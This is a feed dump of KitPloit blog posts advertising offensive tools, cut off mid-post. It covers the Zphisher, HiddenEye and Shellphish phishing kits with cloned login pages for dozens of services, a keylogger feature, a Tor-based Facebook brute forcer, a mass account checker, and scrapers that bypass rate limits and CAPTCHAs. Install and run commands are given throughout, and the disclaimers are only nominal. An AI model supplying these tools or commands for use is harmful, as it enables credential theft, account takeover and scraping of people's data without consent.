tag:blogger.com,1999:blog-83172222311336605472024-03-19T08:30:32.443-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger26125tag:blogger.com,1999:blog-8317222231133660547.post-48602108449063577192022-05-22T08:30:00.007-04:002022-05-22T08:30:00.279-04:00Fb_Friend_List_Scraper - OSINT Tool To Scrape Names And Usernames From Large Friend Lists On Facebook, Without Being Rate Limited<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgodg5mNtbUEuBFKZPTrCdR8y2jUPrKZK1WZreaE5mKzKfTBfPuuRkI__Pmbi1A9-yOiC5ocbDTdivKpNdD3OHF7Q3E07GzFDj1TkJpqEhZm_WFWpOsK57QCR_DEjL4eTmTsoYM6gjQMSCexB_7Bgu4upzRdjxsZ3qSszKP9qzOd_irHTcQpkhYhW30"><img alt="" border="0" height="92" id="BLOGGER_PHOTO_ID_7100338822436194962" src="https://blogger.googleusercontent.com/img/a/AVvXsEgodg5mNtbUEuBFKZPTrCdR8y2jUPrKZK1WZreaE5mKzKfTBfPuuRkI__Pmbi1A9-yOiC5ocbDTdivKpNdD3OHF7Q3E07GzFDj1TkJpqEhZm_WFWpOsK57QCR_DEjL4eTmTsoYM6gjQMSCexB_7Bgu4upzRdjxsZ3qSszKP9qzOd_irHTcQpkhYhW30=w640-h92" width="640" /></a></p> <p dir="auto"><br /></p> <p dir="auto">OSINT tool to <a href="https://www.kitploit.com/search/label/Scrape" target="_blank" title="scrape">scrape</a> names and <a href="https://www.kitploit.com/search/label/Usernames" target="_blank" title="usernames">usernames</a> from large friend lists on Facebook, without being rate limited.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto">Getting started:</h3> <ul dir="auto"> <li>Install using pip: <code>python -m pip install fb-friend-list-scraper</code></li> <li>Script is now installed as <code>fbfriendlistscraper</code></li> <li>Run with <code>-h</code> or <code>--help</code> to show usage information.</li> </ul> <h3 dir="auto">Usage:</h3><div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: fbfriendlistscraper [-h] -e EMAIL [-p PASSWORD] -u USERNAME [-o OUTFILE] [-w] [-q] [-x] [-s SLEEPMULTIPLIER] [-i PROXY] [-c CMD] Tool to scrape names and usernames from large friend lists on Facebook, without being rate limited options: -h, --help show this help message and exit -e EMAIL, --email EMAIL Email address or <a title=" href="https://www.kitploit.com/search/label/Phone%20Number" number="" phone=""><pre><code>usage: fbfriendlistscraper [-h] -e EMAIL [-p PASSWORD] -u USERNAME [-o OUTFILE] [-w] [-q] [-x] [-s SLEEPMULTIPLIER] [-i PROXY] [-c CMD]
Tool to scrape names and usernames from large friend lists on Facebook, without being rate limited
options:
-h, --help show this help message and exit
-e EMAIL, --email EMAIL
Email address or phone number to login with.
-p PASSWORD, --password PASSWORD
Password to login with. If not supplied you will be prompted. You really shouldn't use this for security reasons.
-u USERNAME, --username USERNAME
Username of the user to scrape.
-o OUTFILE, --outfile OUTFILE
Path of the output file. (Default: ./scraped_friends.txt)
-w, --headless Run webdriver in headless mode.
-q, --quiet Do not print scraped users to screen.
-x, --onlyusernames Only the usernames/IDs will be written to the output file.
-s SLEEPMULTIPLIER, --sleepmultiplier SLEEPMULTIPLIER
Multiply sleep time between each page scrape by n. Useful when being easily rate-limited.
-i PROXY, --proxy PROXY
Proxy server to use for connecting. Username/password can be supplied like: socks5://user:pass@host:port
-c CMD, --cmd CMD Shell command to run after each page scrape. Useful for changing proxy/VPN exit.
examples:
fbfriendlistscraper -e your@email.com -p YourPassword123 -u someusername.123 -o my_file.txt
fbfriendlistscraper --email your@email.com --username another.user --headless -s 2 -x
fbfriendlistscraper -e your@email.com -u username.johnson -w --proxy socks5://127.0.0.1:9050
fbfriendlistscraper -e your@email.com -u xxuserxx --headless --cmd "mullvad relay set provider Quadranet"
fbfriendlistscraper -e your@email.com -u markzuckerburger -w -o ./test.txt --cmd "killall -HUP tor"</code></pre></div> <h3 dir="auto">NOTE:</h3> <p dir="auto">Facebook changes the markup of it's pages regularly, so the script might break from time to time. Please open an issue if something doesn't work and I'll take a look at it. Pull requests are welcome as well.</p> <h3 dir="auto">TODO:</h3> <ul dir="auto"> <li>Make script check for followers if friend list isn't public.</li> <li>Add more error handling.</li> <li>Add proxy rotation.</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/narkopolo/fb_friend_list_scraper" rel="nofollow" target="_blank" title="Download Fb_Friend_List_Scraper">Download Fb_Friend_List_Scraper</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19940862890941101372020-03-24T17:30:00.000-03:002020-03-24T17:30:01.554-03:00Zphisher - Automated Phishing Tool<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-bgUGQXhXWDM/XnmGpFgKFII/AAAAAAAASCQ/-lSG2v1XNfwJKNfUUqpq_fhdSq9gPmqNgCNcBGAsYHQ/s1600/zphisher_5_image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="537" data-original-width="356" src="https://1.bp.blogspot.com/-bgUGQXhXWDM/XnmGpFgKFII/AAAAAAAASCQ/-lSG2v1XNfwJKNfUUqpq_fhdSq9gPmqNgCNcBGAsYHQ/s1600/zphisher_5_image.png" /></a></div>
<br />
<em><strong>Zphisher is an upgraded form of Shellphish. The main source code is from <a href="https://github.com/thelinuxchoice/shellphish" rel="nofollow" target="_blank" title="Shellphish">Shellphish</a> . But I have not fully copied it . I have upgraded it & cleared the Unnecessary Files . Zphisher has 37 <a href="https://www.kitploit.com/search/label/Phishing" target="_blank" title="Phishing">Phishing</a> Page Templates ; including <a href="https://www.kitploit.com/search/label/Facebook" target="_blank" title="Facebook">Facebook</a> , Twitter & Paypal . It also has 4 <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="Port Forwarding">Port Forwarding</a> Tools . You can Find the Templates <a href="https://github.com/htr-tech/zphisher/blob/master/websites/Pages.md" rel="nofollow" target="_blank" title="HERE">HERE</a></strong></em><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>[+] Installation :</b></span><br />
<ul>
<li><code>apt update</code></li>
<li><code>apt install git php <a href="https://www.kitploit.com/search/label/OpenSSH" target="_blank" title="openssh">openssh</a> curl -y</code></li>
<li><code>git clone https://github.com/htr-tech/zphisher</code></li>
<li><code>cd zphisher</code></li>
<li><code>chmod +x zphisher.sh</code></li>
<li><code>bash zphisher.sh</code></li>
</ul>
<br />
<b>Or ; Use Single Command</b><br />
<pre><code>apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh</code></pre>
<br />
<span style="font-size: large;"><b>[+] Credits :</b></span><br />
<b>[~] Some of the script is taken from <a href="https://github.com/thelinuxchoice/shellphish/" rel="nofollow" target="_blank" title="Automated Phishing Tool (12)"><strong>Shellphish</strong></a> by <a href="https://github.com/thelinuxchoice/" rel="nofollow" target="_blank" title="Automated Phishing Tool (13)"><strong>thelinuxchoice</strong></a> .</b><br />
<b>[~] Some Phishing Pages are Generated by <a href="https://github.com/DarksecDevelopers/" rel="nofollow" target="_blank" title="DarksecDevelopers">DarksecDevelopers</a> ; <a href="https://github.com/UndeadSec/" rel="nofollow" target="_blank" title="UndeadSec">UndeadSec</a> ; <a href="https://github.com/thelinuxchoice/" rel="nofollow" target="_blank" title="thelinuxchoice">thelinuxchoice</a> & suljot_gjoka</b><br />
<br />
<span style="font-size: large;"><b>[+] Features :</b></span><br />
<b>[+] Latest Login Pages !</b><br />
<b>[+] New <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> Auto Follower Page !</b><br />
<b>[+] All types of Bugs Fixed !</b><br />
<b>[+] Useful for Beginners !</b><br />
<br />
<span style="font-size: large;"><b>[+] Find Me on :</b></span><br />
<b>[~] <a href="https://facebook.com/tahmid.rayat.official/" rel="nofollow" target="_blank" title="Facebook">Facebook</a></b><br />
<b>[~] <a href="https://instagram.com/tahmid.rayat/" rel="nofollow" target="_blank" title="Instagram">Instagram</a></b><br />
<b>[~] <a href="https://github.com/htr-tech/" rel="nofollow" target="_blank" title="Github">Github</a></b><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/htr-tech/zphisher" rel="nofollow" target="_blank" title="Download Zphisher">Download Zphisher</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-3100854986715203242019-08-13T09:38:00.000-04:002019-08-13T09:38:02.407-04:00Goop - Google Search Scraper (Bypass CAPTCHA)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ofwMvZ-6GOs/XVI-rlLrC9I/AAAAAAAAQAE/o4FUQnAnXRId2ECAnwgUHu_-tPQpyf_YACLcBGAs/s1600/goop_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="1354" height="210" src="https://1.bp.blogspot.com/-ofwMvZ-6GOs/XVI-rlLrC9I/AAAAAAAAQAE/o4FUQnAnXRId2ECAnwgUHu_-tPQpyf_YACLcBGAs/s640/goop_4.png" width="640" /></a></div>
<br />
goop can perform google searches without being blocked by the CAPTCHA or hitting any rate limits.<br />
<br />
<span style="font-size: x-large;"><b>How it works?</b></span><br />
Facebook provides a <a href="https://developers.facebook.com/tools/debug/echo/?q=https://example.com" rel="nofollow" target="_blank" title="debugger tool">debugger tool</a> for its scraper. Interestingly, Google doesn't limit the requests made by this <a href="https://www.kitploit.com/search/label/Debugger" target="_blank" title="debugger">debugger</a> (whitelisted?) and hence it can be used to scrap the google search results without being blocked by the CAPTCHA.<br />
Since <a href="https://www.kitploit.com/search/label/Facebook" target="_blank" title="facebook">facebook</a> is involved, a facebook session <code>Cookie</code> must be supplied to the library with each request.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Usage</b></span><br />
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code>pip install goop</code></pre>
<br />
<span style="font-size: large;"><b>Example</b></span><br />
<div>
<pre><code>from goop import goop
page_1 = goop.search('red shoes', '<your facebook cookie>')
page_2 = goop.search('red_shoes', '<your facebook cookie>', page='1')
include_omitted_results = goop.search('red_shoes', '<your facebook cookie>', page='8', full=True)</code></pre>
</div>
The returned is a <code>dict</code> of following structure<br />
<pre><code>{
"0": {
"url": "https://example.com",
"text": "Example webpage",
"summary": "This is an example webpage whose aim is to demonstrate the usage of ..."
},
"1": {
...</code></pre>
<code>cli.py</code> demonstrates the usage by performing google searches from the terminal with the following command<br />
<pre><code>python cli.py <query> <number_of_pages></code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ofwMvZ-6GOs/XVI-rlLrC9I/AAAAAAAAQAE/o4FUQnAnXRId2ECAnwgUHu_-tPQpyf_YACLcBGAs/s1600/goop_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="1354" height="210" src="https://1.bp.blogspot.com/-ofwMvZ-6GOs/XVI-rlLrC9I/AAAAAAAAQAE/o4FUQnAnXRId2ECAnwgUHu_-tPQpyf_YACLcBGAs/s640/goop_4.png" width="640" /></a></div>
<br />
<span style="font-size: x-large;"><b>Legal & Disclaimer</b></span><br />
Scraping google search results is illegal. This library is merely a <a href="https://www.kitploit.com/search/label/Proof%20Of%20Concept" target="_blank" title="proof of concept">proof of concept</a> of the bypass. The author isn't responsible for the actions of the end users.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/s0md3v/goop" rel="nofollow" target="_blank" title="Download Goop">Download Goop</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49622323876591166872019-07-22T09:10:00.000-04:002019-07-22T09:10:13.419-04:00HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s1600/HiddenEye_2_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="1312" height="246" src="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s640/HiddenEye_2_logo.png" width="640" /></a></div>
<div align="center">
<br /></div>
<div align="center">
Modern Phishing Tool With Advanced Functionality </div>
<div align="center">
<br /></div>
<div align="center">
PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING</div>
<a name='more'></a><br />
<span style="font-size: x-large;"><b>DEVELOPERS & CONTRIBUTORS</b></span><br />
<ol>
<li>ANONUD4Y (<a href="https://github.com/An0nUD4Y" rel="nofollow" target="_blank" title="https://github.com/An0nUD4Y">https://github.com/An0nUD4Y</a>)</li>
<li>USAMA ABDUL SATTAR (<a href="https://github.com/usama7628674" rel="nofollow" target="_blank" title="https://github.com/usama7628674">https://github.com/usama7628674</a>)</li>
<li>sTiKyt (<a href="https://github.com/sTiKyt" rel="nofollow" target="_blank" title="https://github.com/sTiKyt">https://github.com/sTiKyt</a>)</li>
<li>UNDEADSEC (<a href="https://github.com/UndeadSec" rel="nofollow" target="_blank" title="https://github.com/UndeadSec">https://github.com/UndeadSec</a>)</li>
<li>Micrafast (<a href="https://github.com/Micrafast" rel="nofollow" target="_blank" title="https://github.com/Micrafast">https://github.com/Micrafast</a>)</li>
<li>___________ (WAITING FOR YOU)</li>
</ol>
<br />
<span style="font-size: x-large;"><b>SCREENSHOT (Android-Userland)</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s1600/HiddenEye_5_Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1440" height="320" src="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s640/HiddenEye_5_Screenshot.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: large;"><b>CREDIT:-</b></span><br />
<ul>
<li>Anonud4y ( I don't remember if i have done Anything )</li>
<li>Usama ( A Most active Developer)</li>
<li>sTiKyt ( Guy Who recustomized everything )</li>
<li>UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)</li>
<li>TheLinuxChoice ( For His Tools Phishing Pages )</li>
</ul>
<br />
<b>TESTED ON FOLLOWING:-</b><br />
<ul>
<li><strong>Kali Linux - Rolling Edition</strong></li>
<li><strong>Parrot OS - Rolling Edition</strong></li>
<li><strong>Linux Mint - 18.3 Sylvia</strong></li>
<li><strong>Ubuntu - 16.04.3 LTS</strong></li>
<li><strong>MacOS High Sierra</strong></li>
<li><strong>Arch Linux</strong></li>
<li><strong>Manjaro XFCE Edition 17.1.12</strong></li>
<li><strong>Black Arch</strong></li>
<li><strong>Userland app (For Android Users)</strong></li>
</ul>
<br />
<b>PREREQUISITES ( Please verify if you have installed )</b><br />
<ul>
<li>Python 3</li>
<li>Wget from Python</li>
<li>PHP</li>
<li>sudo</li>
</ul>
<br />
<span style="font-size: x-large;"><b>FOUND A BUG ? / HAVE ANY ISSUE ? :- (Read This)</b></span><br />
<ul>
<li>Check closed & solved issues/bugs before opening new.</li>
<li>Make sure your issue is related to the codes and resources of this repository.</li>
<li>Its your responsibility to response on your opened issues.</li>
<li>If we don't found user response on his/her issue in the particular time interval , Then we have to close that issue.</li>
<li>Do Not Spam or Advertise & Respect Everyone.</li>
</ul>
<br />
<b>WHAT'S NEW FEATURES</b><br />
<strong>1) LIVE ATTACK</strong><br />
<ul>
<li>Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.</li>
</ul>
<strong>2) COMPATIBILITY</strong><br />
<ul>
<li>All the sites are mobile compatible.</li>
</ul>
<strong>3) KEYLOGGER</strong><br />
<ul>
<li>Now you will also have the ability to capture all the keystokes of victim.</li>
<li>You can now Deploy Keyloggers With (Y/N) option.</li>
<li>Major issues fixed.</li>
</ul>
<strong>4) ANDROID SUPPORT</strong><br />
<ul>
<li>We care about Android Users, So now we have came with two ways to run HiddenEye in Android Devices.</li>
</ul>
<strong>(A) UserLand App</strong><br />
<ul>
<li>You Have to Download UserLand App. <a href="https://play.google.com/store/apps/details?id=tech.ula" rel="nofollow" target="_blank" title="Click Here">Click Here</a> To Download it.</li>
<li>To read more how to set up userland app Read <a href="https://null-byte.wonderhowto.com/how-to/android-for-hackers-turn-android-phone-into-hacking-device-without-root-0189649/" rel="nofollow" target="_blank" title="HERE">HERE</a></li>
</ul>
<strong>(B) Termux App</strong><br />
<ul>
<li>You Have to Download Termux App. <a href="https://play.google.com/store/apps/details?id=com.termux" rel="nofollow" target="_blank" title="Click Here">Click Here</a> To Download it.</li>
<li>For Further instruction <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="Check Instructions">Check Instructions</a></li>
<li>Termux Users Clone With This Command , Unless Errors may occur during Running.</li>
</ul>
<pre><code>git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
</code></pre>
<strong>5) NEW LOOK PROVIDED</strong><br />
<ul>
<li>NOW FOCUS EASILY ON TASKS...</li>
<li>CUSTOMIZE APP WITH YOUR OWN THEMES</li>
</ul>
<strong>6) SERVEO URL TYPE SELECTION AVAILABLE NOW</strong><br />
<ul>
<li>Major issues with serveo is fixed.</li>
<li>Now You can choose out of CUSTOM URL and RANDOM URL.</li>
</ul>
<strong>7) LARGE COLLECTION OF PHISHING PAGES ADDED</strong><br />
<ul>
<li>Pages are taken from various tool including ShellPhish , Blackeye , <a href="https://www.kitploit.com/search/label/SocialFish" target="_blank" title="SocialFish">SocialFish</a> .</li>
</ul>
<br />
<span style="font-size: large;"><b>FOR FURTHER INSTALLATION PROCEDURE - <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="(CHECK INSTRUCTIONS)">(CHECK INSTRUCTIONS)</a></b></span><br />
<br />
<span style="font-size: large;"><b>AVAILABLE PAGES</b></span><br />
<strong>1) Facebook:</strong><br />
<ul>
<li>Traditional Facebook login page.</li>
<li>Advanced Poll Method.</li>
<li>Fake Security login with Facebook Page.</li>
<li>Facebook messenger login page.</li>
</ul>
<strong>2) Google:</strong><br />
<ul>
<li>Traditional Google login page.</li>
<li>Advanced Poll Method.</li>
<li>New Google Page.</li>
</ul>
<strong>3) LinkedIn:</strong><br />
<ul>
<li>Traditional LinkedIn login page.</li>
</ul>
<strong>4) Github:</strong><br />
<ul>
<li>Traditional Github login page.</li>
</ul>
<strong>5) Stackoverflow:</strong><br />
<ul>
<li>Traditional Stackoverflow login page.</li>
</ul>
<strong>6) Wordpress:</strong><br />
<ul>
<li>Similar Wordpress login page.</li>
</ul>
<strong>7) Twitter:</strong><br />
<ul>
<li>Traditional Twitter login page.</li>
</ul>
<strong>8) Instagram:</strong><br />
<ul>
<li>Traditional <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> login page.</li>
<li>Instagram Autoliker Phishing Page.</li>
<li>Instagram Profile Scenario Advanced attack.</li>
<li>Instagram Badge Verify Attack <em>[New]</em></li>
<li>Instagram AutoFollower Phishing Page by (<a href="https://github.com/thelinuxchoice" rel="nofollow" target="_blank" title="https://github.com/thelinuxchoice">https://github.com/thelinuxchoice</a>)</li>
</ul>
<strong>9) SNAPCHAT PHISHING:</strong><br />
<ul>
<li>Traditional Snapchat Login Page</li>
</ul>
<strong>10) YAHOO PHISHING:</strong><br />
<ul>
<li>Traditional Yahoo Login Page</li>
</ul>
<strong>11) TWITCH PHISHING:</strong><br />
<ul>
<li>Traditional Twitch Login Page [ Login With Facebook Also Available ]</li>
</ul>
<strong>12) MICROSOFT PHISHING:</strong><br />
<ul>
<li>Traditional Microsoft-Live Web Login Page</li>
</ul>
<strong>13) STEAM PHISHING:</strong><br />
<ul>
<li>Traditional Steam Web Login Page</li>
</ul>
<strong>14) VK PHISHING:</strong><br />
<ul>
<li>Traditional VK Web Login Page</li>
<li>Advanced Poll Method</li>
</ul>
<strong>15) ICLOUD PHISHING:</strong><br />
<ul>
<li>Traditional iCloud Web Login Page</li>
</ul>
<strong>16) GitLab PHISHING:</strong><br />
<ul>
<li>Traditional GitLab Login Page</li>
</ul>
<strong>17) NetFlix PHISHING:</strong><br />
<ul>
<li>Traditional Netflix Login Page</li>
</ul>
<strong>18) Origin PHISHING:</strong><br />
<ul>
<li>Traditional Origin Login Page</li>
</ul>
<strong>19) Pinterest PHISHING:</strong><br />
<ul>
<li>Traditional Pinterest Login Page</li>
</ul>
<strong>20) Protonmail PHISHING:</strong><br />
<ul>
<li>Traditional Protonmail Login Page</li>
</ul>
<strong>21) Spotify PHISHING:</strong><br />
<ul>
<li>Traditional Spotify Login Page</li>
</ul>
<strong>22) Quora PHISHING:</strong><br />
<ul>
<li>Traditional Quora Login Page</li>
</ul>
<strong>23) PornHub PHISHING:</strong><br />
<ul>
<li>Traditional PornHub Login Page</li>
</ul>
<strong>24) Adobe PHISHING:</strong><br />
<ul>
<li>Traditional Adobe Login Page</li>
</ul>
<strong>25) Badoo PHISHING:</strong><br />
<ul>
<li>Traditional Badoo Login Page</li>
</ul>
<strong>26) CryptoCurrency PHISHING:</strong><br />
<ul>
<li>Traditional CryptoCurrency Login Page</li>
</ul>
<strong>27) DevianArt PHISHING:</strong><br />
<ul>
<li>Traditional DevianArt Login Page</li>
</ul>
<strong>28) DropBox PHISHING:</strong><br />
<ul>
<li>Traditional DropBox Login Page</li>
</ul>
<strong>29) eBay PHISHING:</strong><br />
<ul>
<li>Traditional eBay Login Page</li>
</ul>
<strong>30) MySpace PHISHING:</strong><br />
<ul>
<li>Traditional Myspace Login Page</li>
</ul>
<strong>31) PayPal PHISHING:</strong><br />
<ul>
<li>Traditional PayPal Login Page</li>
</ul>
<strong>32) Shopify PHISHING:</strong><br />
<ul>
<li>Traditional Shopify Login Page</li>
</ul>
<strong>33) Verizon PHISHING:</strong><br />
<ul>
<li>Traditional Verizon Login Page</li>
</ul>
<strong>34) Yandex PHISHING:</strong><br />
<ul>
<li>Traditional Yandex Login Page</li>
</ul>
<br />
<b>Ascii error fix</b><br />
<code>dpkg-reconfigure locales</code><br />
<code>Then select: "All locales" Then select "en_US.UTF-8"</code><br />
<code>After that reboot your machine. Then open terminal and run the command: "locale"</code><br />
<code>There you will see "en_US.UTF-8" which is the default language. Instead of POSIX.</code><br />
<br />
<span style="font-size: large;"><b>DISCLAIMER</b></span><br />
<div align="center">
TO BE USED FOR EDUCATIONAL PURPOSES ONLY </div>
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a>.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/DarkSecDevelopers/HiddenEye" rel="nofollow" target="_blank" title="Download HiddenEye">Download HiddenEye</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38675168952362712652019-07-04T18:39:00.000-04:002019-07-04T18:39:05.973-04:00Fbchecker - Facebook Mass Account Checker<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-QK6cJbVZPss/XRqSgfROahI/AAAAAAAAPf0/jtsgbdgdfJUUGMHS6w_bgtFxvxh-WfXEQCLcBGAs/s1600/fbchecker_1_ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="1000" height="212" src="https://1.bp.blogspot.com/-QK6cJbVZPss/XRqSgfROahI/AAAAAAAAPf0/jtsgbdgdfJUUGMHS6w_bgtFxvxh-WfXEQCLcBGAs/s640/fbchecker_1_ss.png" width="640" /></a></div>
<br />
Facebook Mass Account <a href="https://www.kitploit.com/search/label/Checker" target="_blank" title="Checker">Checker</a><br />
<a name='more'></a><br />
Simple Installation :<br />
<pre><code>apt install git
apt install php
git clone https://github.com/fdciabdul/fbchecker
cd fbchecker
php fbcheck.php</code></pre>
Usage<br />
<pre><code> php fbcheck.php target.txt</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/fdciabdul/fbchecker" rel="nofollow" target="_blank" title="Download Fbchecker">Download Fbchecker</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-90222758145651384832019-06-08T18:13:00.000-04:002019-06-08T18:13:00.127-04:00Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-vlcKUro51Ig/XPYbJjUUM5I/AAAAAAAAPPk/u7SsFXyRbdAZ4v_emiRND03tAhthT_EPACLcBGAs/s1600/shellphish_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="611" height="502" src="https://1.bp.blogspot.com/-vlcKUro51Ig/XPYbJjUUM5I/AAAAAAAAPPk/u7SsFXyRbdAZ4v_emiRND03tAhthT_EPACLcBGAs/s640/shellphish_1.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest.</div>
<a name='more'></a><br />
<b>This script uses some webpages generated by <a href="https://www.kitploit.com/search/label/SocialFish" target="_blank" title="SocialFish">SocialFish</a> Tool (<a href="https://github.com/UndeadSec/SocialFish" rel="nofollow" target="_blank" title="https://github.com/UndeadSec/SocialFish">https://github.com/UndeadSec/SocialFish</a>)</b><br />
<br />
<b>Instagram webpage generated by An0nUD4Y (@its_udy) (<a href="https://github.com/An0nUD4Y" rel="nofollow" target="_blank" title="https://github.com/An0nUD4Y">https://github.com/An0nUD4Y</a>)</b><br />
Phishing Tool for Instagram, Facebook, Twitter, Snapchat, Github, Yahoo, Protonmail, Google, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Pinterest +1 customizable<br />
<br />
<b>Features:</b><br />
<br />
<b>Port Forwarding using <a href="https://www.kitploit.com/search/label/Ngrok" target="_blank" title="Ngrok">Ngrok</a> or Serveo</b><br />
<br />
<span style="font-size: large;"><b>Legal disclaimer:</b></span><br />
Usage of Shellphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
<b>Usage:</b><br />
<pre><code>git clone https://github.com/thelinuxchoice/shellphish
cd shellphish
bash shellphish.sh</code></pre>
<br />
<span style="font-size: large;"><b>Author: github.com/thelinuxchoice</b></span><br />
<span style="font-size: large;"><b>IG: instagram.com/linux_choice</b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/thelinuxchoice/shellphish" rel="nofollow" target="_blank" title="Download Shellphish">Download Shellphish</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9997423411544171312019-06-01T17:49:00.000-04:002019-06-01T17:49:01.903-04:00Facebash - Facebook Brute Forcer In Shellscript Using TOR<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-wq19op7wzSU/XPFnFf0GqdI/AAAAAAAAPNI/FcVFN9sjxecnUiFuaaWh1t1GQgrH74-TQCLcBGAs/s1600/facebash_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="475" data-original-width="552" src="https://1.bp.blogspot.com/-wq19op7wzSU/XPFnFf0GqdI/AAAAAAAAPNI/FcVFN9sjxecnUiFuaaWh1t1GQgrH74-TQCLcBGAs/s1600/facebash_1.png" /></a></div>
<br />
Facebook <a href="https://www.kitploit.com/search/label/Brute" target="_blank" title="Brute">Brute</a> Forcer in <a href="https://www.kitploit.com/search/label/Shellscript" target="_blank" title="shellscript">shellscript</a> using TOR<br />
<br />
<b style="font-size: x-large;">IG: @thelinuxchoice</b><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Legal disclaimer:</b></span><br />
Usage of Facebash for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
<b>WARNING:</b><br />
<pre><code>Facebook blocks account for 1 hour after 20 wrong passwords, so this script can perform only 20 pass/h.</code></pre>
<br />
<b>Features</b><br />
<ul>
<li>Save/Resume sessions</li>
<li>Anonymous attack through TOR</li>
<li>Default Password List (+39k)</li>
</ul>
<br />
<b>Usage:</b><br />
<pre><code>git clone https://github.com/thelinuxchoice/facebash
